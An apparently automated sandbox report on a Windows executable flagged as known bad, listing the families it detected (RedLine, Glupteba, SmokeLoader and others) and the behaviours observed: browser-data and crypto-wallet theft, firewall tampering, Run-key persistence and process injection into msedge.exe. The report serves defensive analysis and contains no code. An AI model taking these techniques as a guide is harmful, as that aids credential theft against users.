Malware Analysis Report

2024-12-08 01:20

Sample ID 231111-mnr4gadf8w
Target NEAS.f8e284bd0abd20b927c85a295144921ccdb547701cc0bf724f9ca60fbaea124e.exe
SHA256 f8e284bd0abd20b927c85a295144921ccdb547701cc0bf724f9ca60fbaea124e
Tags
glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor paypal discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f8e284bd0abd20b927c85a295144921ccdb547701cc0bf724f9ca60fbaea124e

Threat Level: Known bad

The file NEAS.f8e284bd0abd20b927c85a295144921ccdb547701cc0bf724f9ca60fbaea124e.exe was found to be: Known bad.

Malicious Activity Summary

glupteba mystic redline sectoprat smokeloader zgrat pixelnew2.0 taiga up3 backdoor paypal discovery dropper evasion infostealer loader persistence phishing rat spyware stealer trojan

Glupteba

ZGRat

SectopRAT payload

Glupteba payload

SmokeLoader

Mystic

RedLine payload

RedLine

SectopRAT

Detect ZGRat V1

Detect Mystic stealer payload

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Checks computer location settings

Executes dropped EXE

Reads user/profile data of web browsers

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Suspicious use of SetThreadContext

AutoIT Executable

Detected potential entity reuse from brand paypal.

Launches sc.exe

Unsigned PE

Program crash

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious use of AdjustPrivilegeToken

Enumerates system info in registry

Suspicious use of SendNotifyMessage

Suspicious behavior: MapViewOfSection

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-11-11 10:37

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-11-11 10:37

Reported

2023-11-11 10:39

Platform

win10v2004-20231023-en

Max time kernel

70s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.f8e284bd0abd20b927c85a295144921ccdb547701cc0bf724f9ca60fbaea124e.exe"

Signatures

Detect Mystic stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Mystic

stealer mystic

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2231940048-779848787-2990559741-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1052.exe N/A

Reads user/profile data of web browsers

spyware stealer

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\NEAS.f8e284bd0abd20b927c85a295144921ccdb547701cc0bf724f9ca60fbaea124e.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rz1rK87.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dF3sl45.exe N/A

Checks installed software on the system

discovery

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Detected potential entity reuse from brand paypal.

phishing paypal

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3PO29ug.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3PO29ug.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3PO29ug.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3PO29ug.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3PO29ug.exe N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\3PO29ug.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\11AB.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1052.exe N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A
Token: SeShutdownPrivilege N/A N/A N/A
Token: SeCreatePagefilePrivilege N/A N/A N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 972 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.f8e284bd0abd20b927c85a295144921ccdb547701cc0bf724f9ca60fbaea124e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rz1rK87.exe
PID 972 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.f8e284bd0abd20b927c85a295144921ccdb547701cc0bf724f9ca60fbaea124e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rz1rK87.exe
PID 972 wrote to memory of 2008 N/A C:\Users\Admin\AppData\Local\Temp\NEAS.f8e284bd0abd20b927c85a295144921ccdb547701cc0bf724f9ca60fbaea124e.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rz1rK87.exe
PID 2008 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rz1rK87.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dF3sl45.exe
PID 2008 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rz1rK87.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dF3sl45.exe
PID 2008 wrote to memory of 3592 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\rz1rK87.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dF3sl45.exe
PID 3592 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dF3sl45.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe
PID 3592 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dF3sl45.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe
PID 3592 wrote to memory of 2968 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\dF3sl45.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe
PID 2968 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 4696 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 1576 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 4184 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 2848 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 2968 wrote to memory of 1608 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\1Qs38jN6.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
